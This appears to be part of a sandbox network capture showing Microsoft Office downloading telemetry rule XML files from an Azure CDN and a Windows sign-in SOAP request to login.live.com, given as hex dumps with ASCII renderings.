2024-11-09 01:47:59 UTC	1360	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 43 6f 72 65 55 49 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 43 6f 72 65 55 49 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.CoreUI" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenCoreUI" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
72	192.168.2.7	49817	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:29 UTC	192	OUT	GET /rules/rule120664v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:30 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:29 GMT Content-Type: text/xml Content-Length: 502 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT ETag: "0x8DC582BB6A0D312" x-ms-request-id: fa46a579-901e-0016-6a5f-2eefe9000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014729Z-15869dbbcc6hgzkhhC1DFWgtqs00000001v000000000aq3u x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:30 UTC	502	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />
2024-11-09 01:47:58 UTC	192	OUT	GET /rules/rule703251v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:58 UTC	538	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:58 GMT Content-Type: text/xml Content-Length: 1397 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT ETag: "0x8DC582BE2D942BE" x-ms-request-id: 991e939d-f01e-001f-60d2-2c5dc8000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014758Z-16547b76f7fkj7j4hC1DFW0a9g0000000af000000000947w x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:58 UTC	1397	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 43 6f 72 65 55 49 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 43 6f 72 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.CoreUI.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenCor

Session ID	Source IP	Source Port	Destination IP	Destination Port
73	192.168.2.7	49819	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:29 UTC	192	OUT	GET /rules/rule120666v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:30 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:29 GMT Content-Type: text/xml Content-Length: 474 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT ETag: "0x8DC582BB3F48DAE" x-ms-request-id: 6dc34679-101e-0034-7d01-2d96ff000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014729Z-16547b76f7fmbrhqhC1DFWkds80000000amg0000000016f8 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:30 UTC	474	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />
2024-11-09 01:47:59 UTC	192	OUT	GET /rules/rule702401v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:59 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:59 GMT Content-Type: text/xml Content-Length: 1405 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT ETag: "0x8DC582BE7663425" x-ms-request-id: de69b1d8-001e-005a-615f-2ec3d0000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014759Z-17df447cdb5zfhrmhC1DFWh33000000006s0000000008baq x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:59 UTC	1405	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 34 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 43 6f 6d 70 6c 69 61 6e 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702401" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Compliance.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.7	49802	40.126.32.68	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:30 UTC	422	OUT	POST /RST2.srf HTTP/1.0 Connection: Keep-Alive Content-Type: application/soap+xml Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68}) Content-Length: 3592 Host: login.live.com
2024-11-09 01:47:30 UTC	3592	OUT	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
2024-11-09 01:47:30 UTC	568	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: application/soap+xml; charset=utf-8 Expires: Sat, 09 Nov 2024 01:46:30 GMT P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" Referrer-Policy: strict-origin-when-cross-origin x-ms-route-info: C531_BAY x-ms-request-id: 406d42b9-b703-434f-a9c8-f3e3a7b458ec PPServer: PPV: 30 H: PH1PEPF00011E5A V: 0 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-XSS-Protection: 1; mode=block Date: Sat, 09 Nov 2024 01:47:29 GMT Connection: close Content-Length: 1276
2024-11-09 01:47:30 UTC	1276	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200

Session ID	Source IP	Source Port	Destination IP	Destination Port
75	192.168.2.7	49828	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:30 UTC	192	OUT	GET /rules/rule120672v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:31 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:31 GMT Content-Type: text/xml Content-Length: 475 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT ETag: "0x8DC582BBA740822" x-ms-request-id: 898dd9bc-901e-0048-53d2-2cb800000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014731Z-16547b76f7fdf69shC1DFWcpd00000000af000000000228z x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:31 UTC	475	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />
2024-11-09 01:48:00 UTC	192	OUT	GET /rules/rule702600v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:48:01 UTC	538	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:48:00 GMT Content-Type: text/xml Content-Length: 1372 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:00 GMT ETag: "0x8DC582BE9956CBB" x-ms-request-id: a8f02c2b-801e-00a0-3cd2-2c2196000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014800Z-16547b76f7fr4g8xhC1DFW9cqc00000009gg00000000v0pu x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:48:01 UTC	1372	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 36 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 41 75 74 6f 54 65 6d 70 6c 61 74 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 41 75 74 6f 54 65 6d 70 6c 61 74 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702600" V="1" DC="SM" EN="Office.Telemetry.Event.Office.AutoTemplate" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenAutoTemplate" S="Medium" /> <

Session ID	Source IP	Source Port	Destination IP	Destination Port
76	192.168.2.7	49826	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:31 UTC	192	OUT	GET /rules/rule120671v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:31 UTC	491	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:31 GMT Content-Type: text/xml Content-Length: 432 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT ETag: "0x8DC582BAABA2A10" x-ms-request-id: 392771d5-701e-000d-1cd2-2c6de3000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014731Z-16547b76f7fr28cchC1DFWnuws0000000aeg00000000tq70 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:31 UTC	432	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T
2024-11-09 01:48:00 UTC	192	OUT	GET /rules/rule702000v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:48:00 UTC	538	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:48:00 GMT Content-Type: text/xml Content-Length: 1360 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT ETag: "0x8DC582BE46A7D87" x-ms-request-id: be3c462d-f01e-0071-39d2-2c431c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014800Z-16547b76f7frbg6bhC1DFWr5400000000aeg000000004awd x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:48:00 UTC	1360	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 30 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 43 61 6e 76 61 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 43 61 6e 76 61 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702000" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Canvas" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenCanvas" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
77	192.168.2.7	49824	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-09 01:47:31 UTC	192	OUT	GET /rules/rule120669v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:47:31 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:47:31 GMT Content-Type: text/xml Content-Length: 416 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT ETag: "0x8DC582BB5284CCE" x-ms-request-id: a822020c-901e-005b-1ae1-2e2005000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014731Z-17df447cdb5km9skhC1DFWy2rc00000007400000000076mk x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-09 01:47:31 UTC	416	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr
2024-11-09 01:48:00 UTC	192	OUT	GET /rules/rule700300v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-09 01:48:00 UTC	538	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 01:48:00 GMT Content-Type: text/xml Content-Length: 1364 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT ETag: "0x8DC582BEB30DF54" x-ms-request-id: b9b0c79d-201e-0096-6609-2cace6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241109T014800Z-16547b76f7fkcrm9hC1DFWxdag0000000afg00000000pwas x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
